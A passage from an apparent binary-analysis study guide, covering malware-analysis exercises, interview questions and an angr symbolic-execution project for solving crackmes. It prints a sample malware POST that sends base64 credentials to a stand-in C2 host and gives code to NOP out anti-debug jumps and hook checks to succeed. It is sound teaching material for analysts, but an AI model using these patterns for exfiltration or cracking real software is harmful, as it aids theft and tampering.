4. What would you look for after unpacking to start your analysis?

**Exercise 3: Network Traffic Analysis**

You capture this HTTP POST from malware:

```http
POST /gate.php HTTP/1.1
Host: evil-c2.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded

id=PC-12345&os=Win10&data=dXNlcjpwYXNzd29yZDpjcmVkZW50aWFscw==
```

Questions:

  1. Decode the base64 data parameter. What is being exfiltrated?
  2. What are the network IOCs you can extract?
  3. How would you write a Snort/Suricata rule to detect this?
  4. How could the malware author make this harder to detect?
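
Question 1 can be checked in a couple of lines of Python:

```python
import base64

# Decode the `data` parameter from the captured POST body
decoded = base64.b64decode("dXNlcjpwYXNzd29yZDpjcmVkZW50aWFscw==")
print(decoded)  # b'user:password:credentials'
```

CyberChef's "Magic" operation does the same job when you don't know the encoding in advance.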

Exercise 4: Anti-Analysis Technique Identification

You’re debugging malware in x64dbg and it keeps crashing. You notice this assembly:

```asm
call GetTickCount
mov ebx, eax
; ... some code ...
call GetTickCount
sub eax, ebx
cmp eax, 0x3E8      ; 1000ms
jg  exit_immediately
```

Questions:

  1. What anti-analysis technique is this?
  2. How would you bypass it in a debugger?
  3. How would you patch the binary to remove this check?
  4. What other timing-based checks might malware use?
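
Question 3 comes down to overwriting the conditional jump with NOPs. A hedged sketch — 0x7F really is the opcode for the short `jg rel8` form, but the offset you patch would come from your disassembler, not a guess:

```python
def nop_out_jump(binary: bytes, offset: int, length: int = 2) -> bytes:
    """Replace a short conditional jump (0x7F xx = jg rel8) with NOPs (0x90)."""
    if binary[offset] != 0x7F:  # sanity check: is this really a jg rel8?
        raise ValueError("expected jg (0x7F) at offset")
    return binary[:offset] + b"\x90" * length + binary[offset + length:]
```

The same idea in a debugger: right-click the `jg`, "fill with NOPs", and the timing check can never take the exit branch.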

The Interview Questions They’ll Ask

  1. “Walk me through your complete malware analysis workflow, from receiving a sample to writing a report.”
    • Expected Answer: (1) Triage: hash check, VirusTotal, file type. (2) Safe Lab: isolated VM, snapshot. (3) Behavioral: run with procmon/tcpdump, observe actions. (4) Static: strings, imports, unpack if needed. (5) Deep dive: disassemble key functions, understand crypto/obfuscation. (6) Report: IOCs, YARA rule, detection strategies, mitigation advice.
  2. “You receive a packed malware sample. How do you unpack it?”
    • Expected Answer: (1) Identify packer (strings, entropy, UPX signature). (2) Try automated tools (UPX -d, unpacme.com). (3) If fails, dynamic unpacking: run in debugger, find OEP (Original Entry Point) after unpacking stub, dump memory. (4) Fix import table if needed. (5) Validate unpacked binary runs correctly.
  3. “How would you identify the C2 server in a malware sample using only static analysis?”
    • Expected Answer: (1) Strings search for IPs, domains, URLs. (2) Check data sections for encoded/encrypted configs. (3) Analyze code for decryption routines. (4) Look for DGA (Domain Generation Algorithm) if no hardcoded domains. (5) Check resources for embedded configs. Sometimes requires hybrid approach: breakpoint on network functions, dump arguments.
  4. “Explain the difference between signature-based, heuristic, and behavioral malware detection.”
    • Expected Answer: Signature: exact pattern matching (hash, byte sequences) - fast, no false positives, but easily evaded. Heuristic: fuzzy matching, YARA rules, structural patterns - catches variants, some false positives. Behavioral: monitors actions (file writes, registry changes) - catches zero-days, but requires runtime overhead and sophisticated analysis.
  5. “A malware sample won’t run in your VM. It just exits immediately. What do you do?”
    • Expected Answer: Likely anti-VM checks. (1) Static analysis: look for VM detection (CPUID, registry checks, process names). (2) Patch checks: NOP out conditional jumps. (3) Modify environment: change VM artifacts, rename VBoxService.exe. (4) Use bare metal if possible. (5) Hybrid: use IDA + debugger to trace execution path, find exit condition.
  6. “What’s process hollowing and how would you detect it?”
    • Expected Answer: Malware creates a legitimate process in a suspended state, unmaps its memory, writes malicious code into it, and resumes it; the result looks legitimate in the process list. Detection: (1) Memory forensics: compare the on-disk image to the in-memory image - a mismatch indicates hollowing. (2) Monitor API sequence: CreateProcess (suspended), ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread. (3) Tools: Volatility’s hollowfind plugin.
  7. “How do you determine if malware uses encryption, and how do you extract the key?”
    • Expected Answer: (1) Detection: high entropy sections, crypto constants (AES S-boxes, RC4 KSA), imports from crypto libraries. (2) Key extraction: If runtime encryption, breakpoint on encrypt/decrypt function, inspect arguments. If config encryption, find decryption routine, trace back to key (often XOR or AES with hardcoded key). (3) For XOR, frequency analysis or known-plaintext attacks.
  8. “What’s the difference between static and dynamic malware analysis, and when would you use each?”
    • Expected Answer: Static: analyze without executing - safe, fast, works on any platform, but defeated by obfuscation/packing. Good for: IOC extraction, packer identification, quick triage. Dynamic: execute in sandbox - sees runtime behavior, defeats packing, but requires safe environment, malware might detect VM, time-delayed payloads might not trigger. Use both: static for triage, dynamic for behavior, back to static for deep understanding.
  9. “How would you analyze ransomware safely without infecting your entire network?”
    • Expected Answer: (1) Isolation: VM with NO network access, or completely isolated VLAN. (2) Snapshots: before running, snapshot everything. (3) Shares: DO NOT mount network shares or shared folders. (4) Monitoring: procmon, regshot, file monitoring to see encryption activity. (5) Static first: don’t run if you can extract encryption scheme statically. (6) Sacrifice VM: expect it to be destroyed, revert to snapshot after. (7) Memory forensics: dump memory to get keys if possible.
  10. “You find a suspicious PowerShell script. How do you analyze it?”
    • Expected Answer: (1) Deobfuscate: remove backticks, character substitution, base64 decode. (2) Beautify: format for readability. (3) Static analysis: what commands does it run? Download from URL? Execute shellcode? (4) Sandbox: PowerShell ISE with ExecutionPolicy bypass, trace execution. (5) Script logging: enable PowerShell script block logging in Windows. (6) IOCs: extract URLs, IPs, file paths. (7) Tools: PSDecode, CyberChef, REMnux.

Books That Will Help

Topic Book Chapter/Section Why It Matters
Complete Malware Analysis Workflow “Practical Malware Analysis” by Sikorski & Honig Ch. 1-3: Basic Static and Dynamic Analysis The canonical reference for malware analysis methodology
Lab Setup & Safe Environments “Practical Malware Analysis” Ch. 2: Malware Analysis in Virtual Machines How to build an analysis lab that won’t infect you
PE File Format “Practical Malware Analysis” Ch. 1: Basic Static Techniques Understanding Windows executables
x86/x64 Assembly for Malware “Practical Malware Analysis” Ch. 4: A Crash Course in x86 Disassembly Reading the assembly that malware generates
Windows API & Malware Techniques “Practical Malware Analysis” Ch. 7-12: Advanced Dynamic/Static Analysis How malware uses Windows internals
Anti-Analysis Techniques “Practical Malware Analysis” Ch. 15-18: Anti-Disassembly, Anti-Debugging, Anti-VM, Packers Defeating malware countermeasures
Binary File Formats (PE & ELF) “Practical Binary Analysis” by Dennis Andriesse Ch. 2-3: ELF Format (similar to PE) Understanding executable structure
Advanced Disassembly “Practical Binary Analysis” Ch. 6: Disassembly and Binary Analysis Techniques for analyzing obfuscated code
Dynamic Binary Instrumentation “Practical Binary Analysis” Ch. 11: Principles of Dynamic Binary Instrumentation Using tools like Pin, DynamoRIO for analysis
Windows Internals for Malware “Windows Internals” by Russinovich & Solomon Part 1, Ch. 3: System Mechanisms Understanding Windows under the hood
Process Injection Techniques “The Art of Memory Forensics” by Ligh et al. Ch. 11: Malware Detection How malware hides in memory
Memory Forensics for Malware “The Art of Memory Forensics” Ch. 11: Malware Detection Extracting malware from memory dumps
Network-Based Malware Analysis “Practical Malware Analysis” Ch. 14: Malware-Focused Network Signatures Analyzing C2 communication
Cryptography in Malware “Practical Malware Analysis” Ch. 13: Data Encoding Understanding how malware uses crypto
Low-Level Programming & Assembly “Low-Level Programming” by Igor Zhirkov Ch. 3-5: Assembly Programming Deep understanding of assembly for analysis
Exploit Development Context “Hacking: The Art of Exploitation” by Jon Erickson Ch. 0x500: Shellcode Understanding shellcode that malware might use
Reverse Engineering Fundamentals “Practical Binary Analysis” Ch. 7-8: Simple Code Injection, Advanced Code Injection Techniques malware uses for code injection

Project 11: Symbolic Execution with angr

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: None (angr is Python-only)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Program Analysis / Constraint Solving
  • Software or Tool: angr framework, Python 3
  • Main Book: angr documentation

What you’ll build: Use symbolic execution to automatically find inputs that reach specific program states, solving CTF challenges and finding bugs.

Why it teaches binary analysis: Symbolic execution represents the frontier of automated program analysis. It finds paths humans might miss.

Core challenges you’ll face:

  • Setting up states → maps to defining where to start
  • Avoiding path explosion → maps to constraining exploration
  • Finding target addresses → maps to what state do you want?
  • Extracting solutions → maps to getting concrete inputs

Resources for key challenges:

Key Concepts:

  • Symbolic State: angr docs - Core Concepts
  • Exploration Techniques: angr docs - Simulation
  • Constraint Solving: Z3 solver basics

Difficulty: Expert. Time estimate: 2-3 weeks. Prerequisites: Projects 1-8, Python proficiency.

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```python
import angr
import claripy

# Load binary
proj = angr.Project('./crackme', auto_load_libs=False)

# Create symbolic input (32 bytes)
password = claripy.BVS('password', 32 * 8)

# Create initial state at entry point
state = proj.factory.entry_state(
    args=['./crackme'],
    stdin=angr.SimFile('/dev/stdin', content=password)
)

# Create simulation manager
simgr = proj.factory.simulation_manager(state)

# Explore: find 'success', avoid 'failure'
simgr.explore(
    find=lambda s: b"Correct" in s.posix.dumps(1),
    avoid=lambda s: b"Wrong" in s.posix.dumps(1)
)

# Extract solution
if simgr.found:
    solution = simgr.found[0].solver.eval(password, cast_to=bytes)
    print(f"Password: {solution.decode()}")
else:
    print("No solution found")
```

Output:

```
Password: sup3r_s3cr3t_k3y
```


**Implementation Hints**:

angr workflow:
1. Load binary with `angr.Project()`
2. Create symbolic variables with `claripy.BVS()`
3. Create initial state with `factory.entry_state()`
4. Create simulation manager with `factory.simulation_manager()`
5. Explore with `simgr.explore(find=..., avoid=...)`
6. Extract solution with `solver.eval()`

Tips for avoiding path explosion:
- Use `avoid` to skip irrelevant paths
- Set memory limits on states
- Use hooks to skip complex functions
- Start exploration from specific addresses

Common patterns:
```python
# Find by address
simgr.explore(find=0x401234, avoid=0x401111)

# Find by output string
simgr.explore(
    find=lambda s: b"WIN" in s.posix.dumps(1),
    avoid=lambda s: b"LOSE" in s.posix.dumps(1)
)

# Hook a function
@proj.hook(0x401000, length=5)
def skip_check(state):
    state.regs.eax = 1  # Always succeed
```

Learning milestones:

  1. Solve simple crackme → Basic symbolic execution
  2. Handle complex inputs → Symbolic arrays
  3. Use hooks → Skip annoying functions
  4. Solve CTF challenges → Real-world application

The Core Question You’re Answering

“Can we automatically explore all possible execution paths in a program and mathematically prove which inputs reach specific program states—without manually testing every input?”

This project introduces symbolic execution, a technique that treats program inputs as mathematical symbols rather than concrete values. Instead of testing one input at a time, you’ll explore entire classes of inputs simultaneously, using constraint solvers to find the exact input that triggers a bug or reaches a target state.

Concepts You Must Understand First

  1. Concrete vs. Symbolic Execution
    • Concrete execution: run program with specific input (“test123”), get specific output
    • Symbolic execution: run program with symbolic input (x₀, x₁, x₂…), track constraints
    • How symbolic execution explores multiple paths simultaneously

    Guiding Questions:

    • What happens when a program branches on symbolic input (if (input[0] == 'A'))?
    • How does symbolic execution differ from fuzzing (which uses random concrete inputs)?
    • Why is symbolic execution deterministic while fuzzing is probabilistic?

    Book References:

    • “Practical Binary Analysis” by Dennis Andriesse - Chapter 11.4: Symbolic Execution
    • angr documentation - Core Concepts: Symbolic Variables
    • Academic paper: “A Survey of Symbolic Execution Techniques” (Baldoni et al., 2018)
  2. SMT Solvers and Constraint Solving
    • Satisfiability Modulo Theories (SMT): solving logical formulas over different domains
    • Z3 solver (used by angr): determines if constraints are satisfiable
    • Constraints accumulate as execution proceeds: x[0] == 'A' AND x[1] != 'B' AND ...

    Guiding Questions:

    • What does it mean for a set of constraints to be “unsatisfiable”?
    • How does angr use Z3 to generate concrete inputs from symbolic constraints?
    • Why is SMT solving computationally expensive (NP-complete in general)?

    Book References:

    • Z3 Tutorial: “Programming Z3” (De Moura & Bjørner)
    • “Computer Systems: A Programmer’s Perspective” - Chapter 2.2: Integer Representations (foundation for bitvector logic)
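
What Z3 does can be illustrated (very inefficiently) by brute-force enumeration. A sketch: collect path constraints as predicates and search for any input that satisfies all of them — an SMT solver reasons about the constraints symbolically instead of enumerating candidates:

```python
from itertools import product

def solve_by_enumeration(constraints, alphabet, length):
    """Find one input satisfying all constraints, or None. Cost: |alphabet|**length."""
    for candidate in product(alphabet, repeat=length):
        s = bytes(candidate)
        if all(c(s) for c in constraints):
            return s
    return None

# Path constraints accumulated along one hypothetical execution path
constraints = [
    lambda s: s[0] == ord("A"),
    lambda s: s[1] != ord("B"),
    lambda s: s[0] + s[1] == 0x90,
]
```

For a 2-byte input this is instant; for the 32-byte password in the angr example above it is 256³² candidates, which is exactly why constraint solving beats enumeration.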
  3. Path Explosion Problem
    • Exponential growth of paths: n branches → 2ⁿ possible paths
    • Loops amplify explosion: 100-iteration loop creates astronomical path count
    • Mitigations: path merging, state pruning, selective exploration

    Guiding Questions:

    • Why does a simple loop for(i=0; i<100; i++) create path explosion?
    • How do you prioritize which paths to explore first?
    • What’s the trade-off between path coverage and analysis time?

    Book References:

    • “Practical Binary Analysis” - Chapter 11.4: Symbolic Execution (discusses path explosion)
    • angr documentation - Exploration Techniques
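
The loop question above is easy to quantify. A sketch counting how branch count and loop iterations multiply the number of paths:

```python
def paths_through_branches(n: int) -> int:
    # Each two-way branch doubles the number of feasible paths
    return 2 ** n

def paths_through_loop(iterations: int, branches_per_iteration: int = 1) -> int:
    # A loop re-executes its branches once per iteration, compounding the count
    return (2 ** branches_per_iteration) ** iterations

print(paths_through_branches(10))  # 1024
print(paths_through_loop(100))     # 2**100: one small loop, ~1.27e30 paths
```

These counts are upper bounds — many paths are infeasible once constraints are checked — but the exponential shape is why exploration strategies and path merging matter.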
  4. Intermediate Representation (IR)
    • angr uses VEX IR (from Valgrind) to represent machine code abstractly
    • Why IR: easier to analyze than raw assembly, architecture-independent
    • Statements, expressions, and temporary variables in VEX

    Guiding Questions:

    • Why doesn’t angr operate directly on x86/ARM assembly?
    • What information is lost when translating assembly → IR?
    • How do you map a VEX IR address back to assembly for debugging?

    Book References:

    • angr documentation - Core Concepts: Intermediate Representation
    • “Practical Binary Analysis” - Chapter 11.3: Dynamic Binary Instrumentation (similar IR concepts)
  5. Simulation State and Memory Models
    • angr’s SimState: CPU registers, memory, file system, all symbolic or concrete
    • Symbolic memory: can read/write symbolic values
    • Lazy memory model: only allocates pages when accessed

    Guiding Questions:

    • What happens when you read from a symbolic memory address?
    • How does angr decide whether a memory value is symbolic or concrete?
    • Why is lazy memory initialization important for performance?

    Book References:

    • angr documentation - Core Concepts: States
    • angr documentation - Top-Level Interfaces: Simulation Managers
  6. Control Flow Graph (CFG) Recovery
    • angr builds CFG by discovering basic blocks and edges
    • Static CFG (fast, incomplete) vs. Dynamic CFG (slower, more accurate)
    • Function boundaries, indirect jumps, and obfuscation challenges

    Guiding Questions:

    • How does angr discover code in a stripped binary without symbols?
    • What makes indirect jumps (jmp rax) hard for CFG recovery?
    • Why might a packed binary confuse CFG analysis?

    Book References:

    • “Practical Binary Analysis” - Chapter 6.3: Control Flow Graph Recovery
    • angr documentation - Advanced Topics: CFG
  7. Symbolic Execution Strategies
    • DFS (Depth-First Search): go deep, might miss states
    • BFS (Breadth-First Search): explore level-by-level, memory intensive
    • Veritesting: smart path merging to reduce state explosion
    • Custom exploration: prioritize based on distance to target

    Guiding Questions:

    • When would DFS find a solution faster than BFS?
    • What’s path merging and why does it help with loops?
    • How do you write a custom exploration technique?

    Book References:

    • angr documentation - Simulation Managers: Exploration Techniques
    • Paper: “Enhancing Symbolic Execution with Veritesting” (Avgerinos et al., 2014)
  8. Hooking and Environment Interaction
    • Replacing library functions with Python summaries (SimProcedures)
    • Modeling system calls without actually executing them
    • Creating simplified environments for complex functions

    Guiding Questions:

    • Why hook strlen() instead of symbolically executing it?
    • How do you model a network socket in symbolic execution?
    • What happens if you don’t hook malloc() and the program allocates GB of memory?

    Book References:

    • angr documentation - Advanced Topics: SimProcedures
    • angr documentation - Examples: Hooking
  9. Constraint Optimization and Caching
    • Incremental solving: reuse previous solutions
    • Constraint simplification before sending to Z3
    • State cloning and copy-on-write optimizations

    Guiding Questions:

    • Why is solving x == 5 much faster than x * y + z == 1000?
    • How does angr cache solver results to speed up analysis?
    • What’s the cost of cloning a state with gigabytes of symbolic memory?

    Book References:

    • angr documentation - Solver Engine
    • Academic paper on symbolic execution optimization techniques
  10. Concretization Strategies
    • When symbolic execution can’t continue symbolically (e.g., symbolic jump target)
    • Concretization: picking a concrete value for a symbolic variable
    • Strategies: max/min value, single solution, all solutions (fork)

    Guiding Questions:

    • What happens when a program does jmp [symbolic_address]?
    • Why might concretization cause you to miss valid paths?
    • How do you decide which value to concretize to?

    Book References:

    • angr documentation - Solver: Concretization Strategies
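To ground the concepts above without installing anything, here is a stdlib-only Python sketch (not angr): it shows how a path condition accumulates one predicate per branch taken, and how a satisfiability query over that condition yields a concrete input. The two-byte program and every name in it are invented for illustration.

```python
# Toy illustration of path constraints (stdlib only, not angr): record the
# path condition for a route through a tiny program, then "solve" it by
# brute force the way an SMT solver answers a satisfiability query.

from itertools import product

# Predicates for the invented program: if (b0 == 0x7F) { if (b1 > b0) win(); }
PREDS = {
    "b0 == 0x7F": lambda b0, b1: b0 == 0x7F,
    "b1 > b0":    lambda b0, b1: b1 > b0,
}

def solve(path_condition):
    """Return any (b0, b1) satisfying every (predicate, expected) pair."""
    for b0, b1 in product(range(256), repeat=2):
        if all(PREDS[p](b0, b1) == want for p, want in path_condition):
            return (b0, b1)
    return None  # unsatisfiable: the path is infeasible

# The 'win' path accumulates one constraint per branch taken:
win_path = [("b0 == 0x7F", True), ("b1 > b0", True)]
print(solve(win_path))  # -> (127, 128)
```

Real solvers like Z3 reason over bitvector logic instead of enumerating, which is why they scale to constraints far beyond what brute force can handle.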

Questions to Guide Your Design

  1. How do you choose the right starting point for symbolic execution?
    • Start at entry point (complete but slow) vs. start at function of interest (fast but requires setup)
    • How do you set up registers/memory when starting mid-program?
  2. How do you write a find condition that’s neither too broad nor too narrow?
    • Too broad: “any state that prints output” (finds wrong solution)
    • Too narrow: “state at address 0x401234” (misses alternate paths)
    • Consider: output strings, register values, success indicators
  3. What’s your strategy for dealing with loops in symbolic execution?
    • Hook and skip them? Bound the iteration count? Use loop summarization?
    • When is it safe to unroll a loop symbolically?
  4. How do you handle programs that read from files or network?
    • Model file contents as symbolic variables
    • Create SimFiles with symbolic or concrete content
    • What if the file size itself affects control flow?
  5. When should you use hooks vs. letting angr execute the real code?
    • Hook when: function is complex (encryption), irrelevant (logging), or environment-dependent (network)
    • Don’t hook when: function contains target logic, or you need exact behavior
  6. How do you extract useful information from an “avoided” state?
    • Sometimes you want to know why a path was avoided (e.g., failed authentication)
    • Can you extract constraints from avoided states to understand preconditions?
  7. How would you use angr to find buffer overflow vulnerabilities?
    • Create symbolic buffer, look for states where return address is symbolic
    • Check if constraints allow attacker-controlled values in RIP/EIP
  8. What’s the difference between angr and a fuzzer like AFL++?
    • angr: deterministic, finds exact inputs, but slow and suffers path explosion
    • AFL++: probabilistic, fast, but might miss rare conditions
    • When would you use one over the other?
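Several of the questions above hinge on the DFS-vs-BFS trade-off. This stdlib-only toy (not angr) makes it concrete: states are bit-strings in a depth-6 binary tree, the "solution" sits at the end of the all-ones path, and we count both steps taken and peak frontier size (a rough proxy for memory use).

```python
# DFS reaches a deep target in few steps with a small frontier; BFS visits
# every shallower state first and holds a whole tree level in memory.

from collections import deque

DEPTH = 6

def successors(state):
    # Each branch appends one bit until the maximum depth is reached.
    return [state + "0", state + "1"] if len(state) < DEPTH else []

def explore(strategy, target="1" * DEPTH):
    frontier = deque([""])
    steps, peak = 0, 1
    while frontier:
        state = frontier.pop() if strategy == "dfs" else frontier.popleft()
        steps += 1
        if state == target:
            return steps, peak
        frontier.extend(successors(state))
        peak = max(peak, len(frontier))
    return None

print("dfs:", explore("dfs"))  # (7, 7): straight down to the target
print("bfs:", explore("bfs"))  # (127, 64): every state, whole level in memory
```

The flip side: if the target had been "000000", DFS with this child ordering would have explored the entire right half of the tree first, which is exactly why angr supports pluggable exploration techniques.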

Thinking Exercise

Exercise 1: Understanding Symbolic Constraints

Consider this simple program:

int check_password(char *input) {
    if (input[0] == 'P' && input[1] == 'W' && input[2] - input[3] == 5) {
        return 1;  // Success
    }
    return 0;  // Fail
}

If input is symbolic, answer:

  1. What constraint is added after the first comparison (input[0] == 'P')?
  2. What are ALL the constraints accumulated by the time we reach return 1?
  3. Give one concrete input that satisfies these constraints (besides “PW…”).
  4. How many possible concrete inputs exist? (Hint: think about input[2] and input[3])
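You can sanity-check your answers by brute force. The sketch below assumes plain byte values 0–255 with ordinary integer subtraction (ignoring signed-char wraparound, which would change the count):

```python
# Enumerate all (input[2], input[3]) pairs satisfying the third constraint;
# input[0] and input[1] are fully pinned by the first two constraints.

from itertools import product

pairs = [(c2, c3) for c2, c3 in product(range(256), repeat=2) if c2 - c3 == 5]

print(len(pairs))                              # count of valid pairs
print(bytes([ord("P"), ord("W"), *pairs[0]]))  # one satisfying 4-byte input
```

This is exactly the kind of query you would otherwise hand to `state.solver.eval` in angr: the first two bytes have a single model each, while the third constraint relates two bytes and admits many models.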

Exercise 2: Path Explosion Calculation

Consider this code:

for (int i = 0; i < N; i++) {
    if (input[i] == 'A') {
        process_A();
    } else {
        process_B();
    }
}

Questions:

  1. How many paths exist for N=5?
  2. How many paths for N=20?
  3. If each state takes 1 second to solve, how long for N=30?
  4. What techniques could angr use to reduce this explosion?
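A few lines of Python confirm the arithmetic behind questions 1–3 (one second per state is, of course, an assumed cost):

```python
# Each loop iteration branches once, so N iterations yield 2**N paths.

def num_paths(n):
    return 2 ** n

print(num_paths(5))                       # 32
print(num_paths(20))                      # 1048576
seconds = num_paths(30)                   # at one state per second
print(seconds // (60 * 60 * 24 * 365))    # ~34 years of solver time
```

Thirty-four years for a 30-iteration loop is the whole argument for path merging, loop bounding, and avoid conditions in one number.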

Exercise 3: Writing a Find Condition

You’re analyzing a crackme that prints either “Correct password!” or “Try again.” to stdout. Write the angr find and avoid conditions:

simgr.explore(
    find=???,
    avoid=???
)

Consider:

  • Should you search for output strings? Address? Register values?
  • What if the program prints both messages under different conditions?
  • How do you avoid false positives?
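To build intuition for what find/avoid predicates do, here is a stdlib-only stand-in (no angr): states are (address, stdout-so-far) pairs, and the explorer searches an invented three-branch program for a state whose output contains the success string. The PROGRAM table, addresses, and messages are all made up.

```python
# Toy model of simgr.explore(find=..., avoid=...): both conditions are
# plain callables over states, and avoided states are pruned immediately.

from collections import deque

# Hypothetical program: address -> list of (next_address, stdout chunk)
PROGRAM = {
    0x1000: [(0x1010, ""), (0x1020, "")],
    0x1010: [(0x1030, "Correct password!\n")],
    0x1020: [(0x1040, "Try again.\n")],
}

def explore(find, avoid):
    frontier = deque([(0x1000, "")])
    while frontier:
        addr, out = frontier.popleft()
        if avoid((addr, out)):
            continue                      # prune: never expand this state
        if find((addr, out)):
            return addr, out
        for next_addr, chunk in PROGRAM.get(addr, []):
            frontier.append((next_addr, out + chunk))
    return None

found = explore(
    find=lambda s: "Correct" in s[1],
    avoid=lambda s: "Try again" in s[1],
)
print(found)
```

In real angr the equivalent predicate would inspect `state.posix.dumps(1)` for the stdout bytes; the point here is that output-based conditions survive address changes, whereas a hardcoded find address does not.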

Exercise 4: Designing a Hook

The target program calls strlen(user_input) and you want to hook it for performance:

@proj.hook(strlen_address)
def strlen_hook(state):
    # Your implementation here
    pass

Questions:

  1. How do you get the string pointer from the function argument?
  2. How do you calculate symbolic string length?
  3. What do you return and where do you put it?
  4. What edge cases might break your hook?

Exercise 5: Debugging Symbolic Execution

You run angr on a crackme and it explores 10,000 states in 5 minutes without finding a solution. What do you check?

  1. Is path explosion happening? (Check active/deadended states count)
  2. Is the find condition correct? (Print state info when states reach suspected area)
  3. Are you starting from the right place?
  4. Should you add hooks to skip expensive functions?
  5. Are there loops that need bounding?

Write a debugging checklist for troubleshooting angr scripts.

The Interview Questions They’ll Ask

  1. “Explain symbolic execution to someone who only knows basic programming.”
    • Expected Answer: “Instead of running a program with one specific input like ‘hello’, symbolic execution runs it with a placeholder ‘X’ that represents ANY possible input. As the program runs, it tracks rules like ‘if X[0] == ‘h’ then take this branch, else take that branch’. At the end, it uses a math solver to find what X should be to reach a specific goal, like printing ‘success’.”
  2. “What’s the path explosion problem and how do you mitigate it?”
    • Expected Answer: Each branch doubles possible paths (2ⁿ growth). Loops amplify this massively. Mitigations: (1) Bound loop iterations. (2) Use avoid to prune uninteresting paths. (3) Path merging (veritesting). (4) Start execution closer to target. (5) Hook complex functions. (6) Use exploration strategies like DFS or prioritized search. (7) Set state limits and timeouts.
  3. “When would you use symbolic execution instead of fuzzing?”
    • Expected Answer: Use symbolic execution when: (1) You need to find exact input for rare condition (e.g., exact password, magic number). (2) Path requires multiple constraints (fuzzing unlikely to hit). (3) You need proof input exists vs. probabilistic search. Use fuzzing when: (1) Fast results needed. (2) Program is large (path explosion). (3) Target is common bugs (crashes) not specific paths.
  4. “How does angr use Z3 solver?”
    • Expected Answer: angr accumulates constraints as path conditions (e.g., x[0] == 'P' AND x[1] == 'W' AND x[2] > 100). When you ask for a solution, angr converts these to Z3’s bitvector logic and asks “is this satisfiable?” Z3 uses SMT solving algorithms to either find values that satisfy all constraints, or prove none exist.
  5. “You’re symbolically executing a program and angr hangs. What do you do?”
    • Expected Answer: (1) Check state counts - are active states growing infinitely? (2) Look for unbounded loops in source/assembly. (3) Enable debug logging to see where it’s stuck. (4) Try different exploration strategy (DFS vs BFS). (5) Add hooks to skip expensive functions. (6) Set state limits (max_states parameter). (7) Check if solver is the bottleneck (complex constraints). (8) Start execution closer to target to reduce state space.
  6. “What’s the difference between angr’s static CFG and dynamic CFG?”
    • Expected Answer: Static CFG (CFGFast): analyzes binary without execution, fast, incomplete (misses computed jumps, self-modifying code). Uses pattern matching for function prologue/epilogue. Dynamic CFG (CFGEmulated): traces execution symbolically, slower, more accurate, finds code through actual control flow. Use static for quick overview, dynamic for precision.
  7. “How would you use angr to find a buffer overflow?”
    • Expected Answer: (1) Create symbolic buffer as input. (2) Track stack pointer and return address. (3) Look for states where return address contains symbolic bits (means we control it). (4) Check if constraints allow attacker values (not just symbolic). (5) Use solver to generate overflow payload. (6) Alternatively: look for states where rip/eip is symbolic, or where invalid memory access occurs.
  8. “Explain what happens when you hit a symbolic jump target (jmp [symbolic_address]).”
    • Expected Answer: angr can’t symbolically execute jump to unknown location. It must concretize: choose a concrete value for the address. Strategies: (1) Try all possible values (forks states - explosion!). (2) Use concretization strategy (max, min, or random value). (3) Constrain address to valid code region. (4) This can cause path loss if you concretize to wrong value. Ideally, constrain jump target based on prior analysis.
  9. “How do angr hooks (SimProcedures) work and when should you use them?”
    • Expected Answer: Hooks replace function execution with Python code. When PC reaches hooked address, angr calls Python instead of executing instructions. Use when: (1) Function is expensive (crypto). (2) Environment interaction (file I/O, network). (3) Known behavior (strlen, memcpy) - summarize rather than execute. How: Read arguments from state.regs/memory, compute result, write to return value, adjust stack/PC. Example: hook strcmp to just compare symbolic strings symbolically without executing assembly.
  10. “What’s veritesting and why is it useful?”
    • Expected Answer: Veritesting merges multiple execution paths into a single state using conditional expressions. Instead of forking at each branch (exponential states), it creates merged state: result = if(cond) then A else B. Dramatically reduces path explosion for straight-line code with many branches. Most useful for code with many conditionals but few loops. Enabled with simgr.use_technique(angr.exploration_techniques.Veritesting()).

Books That Will Help

Topic | Book | Chapter/Section | Why It Matters
Symbolic Execution Fundamentals | “Practical Binary Analysis” by Dennis Andriesse | Ch. 11.4: Symbolic Execution | Introduction to symbolic execution concepts
Binary Analysis Foundation | “Practical Binary Analysis” | Ch. 6: Disassembly and Binary Analysis Fundamentals | Understand what angr is analyzing
Dynamic Binary Instrumentation | “Practical Binary Analysis” | Ch. 11: Principles of Dynamic Binary Instrumentation | Related techniques (Pin, DynamoRIO)
Control Flow Graph Recovery | “Practical Binary Analysis” | Ch. 6.3: Control Flow Graphs | How angr discovers program structure
Assembly and Instruction Sets | “Low-Level Programming” by Igor Zhirkov | Ch. 3-5: Assembly Language | Understanding what VEX IR represents
Computer Architecture | “Computer Systems: A Programmer’s Perspective” | Ch. 3: Machine-Level Representation | Foundation for understanding execution
Integer Representations | “Computer Systems: A Programmer’s Perspective” | Ch. 2: Representing and Manipulating Information | Understand bitvector logic in Z3
Memory and Addressing | “Computer Systems: A Programmer’s Perspective” | Ch. 9: Virtual Memory | How angr models memory
Optimization Techniques | “Computer Systems: A Programmer’s Perspective” | Ch. 5: Optimizing Program Performance | Understanding why some code paths are expensive
Linking and Loading | “Computer Systems: A Programmer’s Perspective” | Ch. 7: Linking | How angr loads binaries
Dynamic Analysis | “Practical Malware Analysis” by Sikorski & Honig | Ch. 3: Basic Dynamic Analysis | Complementary dynamic analysis techniques
Control Flow Analysis | “Practical Malware Analysis” | Ch. 4: A Crash Course in x86 Disassembly | Reading assembly to understand paths
Anti-Analysis Bypass | “Practical Malware Analysis” | Ch. 16: Anti-Debugging | Using angr to bypass protections
Constraint Solving Basics | Z3 Tutorial Documentation | Entire tutorial | Understanding the solver angr uses
Academic Foundation | “A Survey of Symbolic Execution Techniques” (Baldoni et al., 2018) | Full paper | Deep dive into symbolic execution research
Veritesting Technique | “Enhancing Symbolic Execution with Veritesting” (Avgerinos et al., 2014) | Full paper | Advanced technique for path merging
angr Framework | angr Official Documentation | Core Concepts, Examples, Advanced Topics | Comprehensive guide to angr usage

Project 12: Fuzzing with AFL++

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (for harnesses), Shell
